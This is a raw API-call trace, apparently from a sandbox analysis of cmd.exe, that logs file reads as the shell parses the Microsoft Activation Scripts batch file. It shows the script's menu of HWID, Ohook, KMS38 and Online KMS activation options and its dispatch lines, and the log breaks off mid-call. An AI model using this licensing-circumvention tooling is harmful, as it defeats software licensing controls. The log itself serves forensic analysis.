\"delims=\" %%a in ('%psc% \"& {write-host $([Environment]::GetFolderPath('Desktop'))}\"') do call set \"_desktop_=%%a\"\r\n") returned 2 [0176.473] GetFileType (hFile=0xac) returned 0x1 [0176.473] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="setlocal EnableDelayedExpansion\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="setlocal EnableDelayedExpansion\r\ndelims=\" %%a in ('%psc% \"& {write-host $([Environment]::GetFolderPath('Desktop'))}\"') do call set \"_desktop_=%%a\"\r\n") returned 33 [0176.473] GetFileType (hFile=0xac) returned 0x1 [0176.473] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\ntlocal EnableDelayedExpansion\r\n") returned 2 [0176.474] GetFileType (hFile=0xac) returned 0x1 [0176.474] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n_=%%a\"\r\n") returned 140 [0176.474] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.474] GetFileType (hFile=0xac) returned 0x1 [0176.474] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.474] GetFileType (hFile=0xac) returned 0x1 [0176.474] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":MainMenu\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":MainMenu\r\n===============================================================================================================================\r\n") returned 11 [0176.474] _wcsicmp (_String1="_colorprep", _String2="MainMenu") returned -14 [0176.474] GetFileType (hFile=0xac) returned 0x1 [0176.474] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nainMenu\r\n") returned 2 [0176.474] GetFileType (hFile=0xac) returned 0x1 [0176.474] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\nMenu\r\n") returned 5 [0176.474] GetFileType (hFile=0xac) returned 0x1 [0176.474] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="color 07\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="color 07\r\n\n") returned 10 [0176.475] GetFileType (hFile=0xac) returned 0x1 [0176.475] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title Microsoft_Activation_Scripts %masver%\r\n", cbMultiByte=46, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="title Microsoft_Activation_Scripts %masver%\r\n============================================================================================\r\n") returned 46 [0176.475] GetFileType (hFile=0xac) returned 0x1 [0176.475] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="mode 76, 30\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="mode 76, 30\r\noft_Activation_Scripts %masver%\r\n") returned 13 [0176.475] GetFileType (hFile=0xac) returned 0x1 [0176.475] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nde 76, 30\r\n") returned 2 [0176.475] GetFileType (hFile=0xac) returned 0x1 [0176.475] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n, 30\r\n") returned 7 [0176.475] GetFileType (hFile=0xac) returned 0x1 [0176.475] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0176.475] GetFileType (hFile=0xac) returned 0x1 [0176.475] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0176.476] GetFileType (hFile=0xac) returned 0x1 [0176.476] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.476] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0176.476] GetFileType (hFile=0xac) returned 0x1 [0176.476] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.476] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ______________________________________________________________\r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: ______________________________________________________________\r\n==============================================================\r\n") returned 76 [0176.476] GetFileType (hFile=0xac) returned 0x1 [0176.476] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.476] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n ______________________________________________________________\r\n") returned 7 [0176.476] GetFileType (hFile=0xac) returned 0x1 [0176.476] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.476] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: Activation Methods:\r\n", cbMultiByte=43, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: Activation Methods:\r\n_______________________________\r\n") returned 43 [0176.476] GetFileType (hFile=0xac) returned 0x1 [0176.476] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.476] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n Activation Methods:\r\n") returned 7 [0176.476] GetFileType (hFile=0xac) returned 0x1 [0176.476] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.476] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [1] HWID ^| Windows ^| Permanent\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [1] HWID ^| Windows ^| Permanent\r\n__\r\n") returned 72 [0176.476] GetFileType (hFile=0xac) returned 0x1 [0176.476] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.477] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [2] Ohook ^| Office ^| Permanent\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [2] Ohook ^| Office ^| Permanent\r\n") returned 72 [0176.477] GetFileType (hFile=0xac) returned 0x1 [0176.477] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.477] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [3] KMS38 ^| Windows ^| Year 2038\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [3] KMS38 ^| Windows ^| Year 2038\r\n") returned 72 [0176.477] GetFileType (hFile=0xac) returned 0x1 [0176.477] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.477] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [4] Online KMS ^| Windows / Office ^| 180 Days\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [4] Online KMS ^| Windows / Office ^| 180 Days\r\n") returned 72 [0176.477] GetFileType (hFile=0xac) returned 0x1 [0176.477] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.477] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: __________________________________________________ \r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: __________________________________________________ \r\n") returned 76 [0176.477] GetFileType (hFile=0xac) returned 0x1 [0176.477] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.477] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n __________________________________________________ \r\n") returned 7 [0176.477] GetFileType (hFile=0xac) returned 0x1 [0176.477] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.477] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [5] Activation Status\r\n", cbMultiByte=41, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [5] Activation Status\r\n___________________________ \r\n") returned 41 [0176.477] GetFileType (hFile=0xac) returned 0x1 [0176.477] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.477] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [6] Troubleshoot\r\n", cbMultiByte=36, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [6] Troubleshoot\r\ntus\r\n") returned 36 [0176.478] GetFileType (hFile=0xac) returned 0x1 [0176.478] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.478] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [7] Extras\r\n", cbMultiByte=30, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [7] Extras\r\nhoot\r\n") returned 30 [0176.478] GetFileType (hFile=0xac) returned 0x1 [0176.478] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.478] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [8] Help\r\n", cbMultiByte=28, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [8] Help\r\n\r\n") returned 28 [0176.478] GetFileType (hFile=0xac) returned 0x1 [0176.478] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.478] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [0] Exit\r\n", cbMultiByte=28, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [0] Exit\r\n") returned 28 [0176.478] GetFileType (hFile=0xac) returned 0x1 [0176.478] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.478] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ______________________________________________________________\r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: ______________________________________________________________\r\n") returned 76 [0176.478] GetFileType (hFile=0xac) returned 0x1 [0176.478] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.478] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n ______________________________________________________________\r\n") returned 7 [0176.478] GetFileType (hFile=0xac) returned 0x1 [0176.478] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.478] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n", cbMultiByte=106, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n") returned 106 [0176.478] GetFileType (hFile=0xac) returned 0x1 [0176.479] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.479] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="choice /C:123456780 /N\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="choice /C:123456780 /N\r\n \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n") returned 24 [0176.479] GetFileType (hFile=0xac) returned 0x1 [0176.479] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.479] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _erl=%errorlevel%\r\n", cbMultiByte=23, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _erl=%errorlevel%\r\n\n") returned 23 [0176.479] GetFileType (hFile=0xac) returned 0x1 [0176.479] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.479] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt _erl=%errorlevel%\r\n") returned 2 [0176.479] GetFileType (hFile=0xac) returned 0x1 [0176.479] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.479] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==9 exit /b\r\n", cbMultiByte=22, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==9 exit /b\r\n\n") returned 22 [0176.479] GetFileType (hFile=0xac) returned 0x1 [0176.479] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.479] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==8 start %mas%troubleshoot.html & goto :MainMenu\r\n", cbMultiByte=60, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==8 start %mas%troubleshoot.html & goto :MainMenu\r\nption in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n") returned 60 [0176.479] GetFileType (hFile=0xac) returned 0x1 [0176.479] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.479] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==7 goto:Extras\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==7 goto:Extras\r\noubleshoot.html & goto :MainMenu\r\n") returned 26 [0176.479] GetFileType (hFile=0xac) returned 0x1 [0176.479] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.480] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==6 setlocal & call :troubleshoot & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==6 setlocal & call :troubleshoot & cls & endlocal & goto :MainMenu\r\n1,2,3,4,5,6,7,8,0] :\"\r\n") returned 83 [0176.480] GetFileType (hFile=0xac) returned 0x1 [0176.480] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.480] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==5 setlocal & call :_Check_Status_wmi & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==5 setlocal & call :_Check_Status_wmi & cls & endlocal & goto :MainMenu\r\n") returned 83 [0176.480] GetFileType (hFile=0xac) returned 0x1 [0176.480] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.480] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==4 setlocal & call :KMSActivation & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==4 setlocal & call :KMSActivation & cls & endlocal & goto :MainMenu\r\n") returned 83 [0176.480] GetFileType (hFile=0xac) returned 0x1 [0176.480] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.480] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==3 setlocal & call :KMS38Activation & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==3 setlocal & call :KMS38Activation & cls & endlocal & goto :MainMenu\r\n") returned 83 [0176.480] GetFileType (hFile=0xac) returned 0x1 [0176.480] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.480] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 